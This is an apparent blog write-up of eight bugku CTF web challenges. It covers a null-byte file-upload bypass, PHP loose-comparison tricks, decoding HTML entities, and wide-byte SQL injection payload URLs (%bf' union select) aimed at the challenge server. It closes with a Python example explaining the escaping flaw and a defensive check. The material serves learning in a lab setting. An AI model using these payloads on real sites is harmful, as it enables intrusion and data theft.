bugku web challenges 1~8 write-up

Blogging for the first time


web2

Opening the page shows an ever-accelerating animation with no obvious clue.
Right-click to inspect the element: the flag is in a comment inside the body, as shown in the figure:

PS: I feel that this question is not very rewarding. Maybe you can study the js code of this question, as a way of learning js.


file upload test

Task: you need to upload a php file to get the flag, but only image files are allowed to be uploaded.
Idea: use %00 to truncate the uploaded file name.
Process: construct a file named 1.php.jpg, upload it and capture the request with burp (as shown in the figure):
Modify the file name: add %00 after .php, URL-decode it so that it becomes a null byte, submit, and get the flag.
Before decoding (figure). After decoding (figure).


calculator

Open the webpage; the interface is shown in the figure.
Trying to enter the answer, you find that the input box only accepts 1 character.
Idea: modify the maxlength attribute of the input box in the element inspector, enter the calculation result and submit it to get the flag (pictured).


web base $_GET

Open the page and get the following code:

<?php
$what = $_GET['what'];      // parameter read from the query string
echo $what;
if ($what == 'flag')        // loose comparison against the string 'flag'
    echo 'flag{****}';

Simply put, pass the parameter in via GET: what=flag
to get the flag.


web base $_POST

Open the page and get the following code:

<?php
$what = $_POST['what'];     // parameter read from the POST body
echo $what;
if ($what == 'flag')        // loose comparison against the string 'flag'
    echo 'flag{****}';

Analysis: pass the parameter in via POST: what=flag
to get the flag (POST parameters can be sent with the Firefox plug-in HackBar).


contradiction

Open the page and get the following code:

<?php
$num = $_GET['num'];
if (!is_numeric($num))      // only input that is NOT numeric reaches the check below
{
    echo $num;
    if ($num == 1)          // loose (==) comparison, not strict (===)
        echo 'flag{**********}';
}

Code analysis:

Function: is_numeric()

is_numeric() — checks whether a variable is a number or a numeric string
Syntax: bool is_numeric ( mixed $var )
Returns TRUE if var is a number or a numeric string, FALSE otherwise.

logic:

The parameter num is passed in via GET. To get the flag, num must not be a number or a numeric string, and yet num==1 must hold,
which is obviously contradictory.

Ideas:

Represent 1 in scientific notation, because scientific notation is not a pure number and can still be equal to one.
PHP scientific notation format: coefficient e+exponent
Examples: 1000==1e+3, 1234==1.234e+3, 1==1e+0. Input
num=1e+0 to get the flag.


web3

When opening the page, pop-up boxes keep appearing. After disabling the pop-ups, inspect the element.
There is a line like this in the script tag; it looks like Unicode encoding. Try decoding it (you can use a webmaster tool, just search for one online) to get the flag:

<!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;-->


Here's a question:
&# + decimal and &#x + hexadecimal both seem to indicate Unicode
encoding. Well, that's how I understand it, I don't know if it's right.


sql injection

Open the page, as shown in the figure.
It asks us to query the string field of the key table where id=1.
Test: single quotes and double quotes return normally, so they are probably escaped. Checking the page elements shows that gb2312 encoding is used,
so try wide-byte injection:

http://103.238.227.13:10083/?id=1%bf'--+
http://103.238.227.13:10083/?id=1%bf' and 1=1--+
http://103.238.227.13:10083/?id=1%bf' and 1=2--+

Without the comment an error is reported; with the comment the page returns normally, so the condition is evaluated and there is injection.
Determine the number of columns:

http://103.238.227.13:10083?id=1%bf' order by 2--+

Determine the echo point:

http://103.238.227.13:10083?id=0%bf' union select 1,2--+

Find the database name:

http://103.238.227.13:10083?id=0%bf' union select database(),2--+
database: sql5

Combine this with the challenge description to get the flag:

http://103.238.227.13:10083?id=0%bf' union select string,2 from sql5.key--+
Get the flag.
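Why the %bf' trick above gets past quote escaping, and how to check for it on the defending side, as an added Python example that is not part of the original write-up. It assumes the backend escapes quotes byte by byte (the way PHP's addslashes() does) while the database reads the bytes as GBK text (the page mentions gb2312; GBK is assumed here because its trail-byte range includes 0x5C, the backslash); the sample query value is constructed from the write-up's own payload.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: the write-up's `id=1%bf'` value as the server receives it.
SAMPLE_QUERY_VALUE = unquote_to_bytes("1%bf'")


def escape_quotes_bytewise(data: bytes) -> bytes:
    """Byte-oriented escaping, as addslashes() behaves: every ' " or backslash
    gets a 0x5C in front of it, with no knowledge of the character set."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives(data: bytes, charset: str = "gbk") -> bool:
    """Escape byte-wise, then read the result as the database does (GBK text).
    True means a quote is still live, i.e. not preceded by a backslash character:
    the 0x5C the escaper inserted was swallowed as the trail byte of a two-byte
    character (0xBF 0x5C), so the quote closes the SQL string literal."""
    text = escape_quotes_bytewise(data).decode(charset, errors="replace")
    return re.search(r"(?<!\\)'", text) is not None


def is_well_formed(data: bytes, charset: str = "gbk") -> bool:
    """Defensive check: reject input that is not valid text in the expected
    charset. A lone 0xBF lead byte followed by 0x27 is not valid GBK."""
    try:
        data.decode(charset)
        return True
    except UnicodeDecodeError:
        return False


def escape_quotes_textwise(data: bytes, charset: str = "gbk") -> str:
    """Decode first, escape on code points second: the inserted backslash is a
    character of its own and can no longer merge with a stray lead byte.
    Malformed bytes raise instead of being guessed at. Parameterized queries,
    with the connection charset declared to the driver, remain the real fix."""
    text = data.decode(charset)           # strict: malformed input raises
    return re.sub(r"(['\"\\])", r"\\\1", text)


if __name__ == "__main__":
    print("byte-wise escaping leaves a live quote:", quote_survives(SAMPLE_QUERY_VALUE))
    print("input is well-formed GBK:", is_well_formed(SAMPLE_QUERY_VALUE))
```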


Origin http://43.154.161.224:23101/article/api/json?id=324791095&siteId=291194637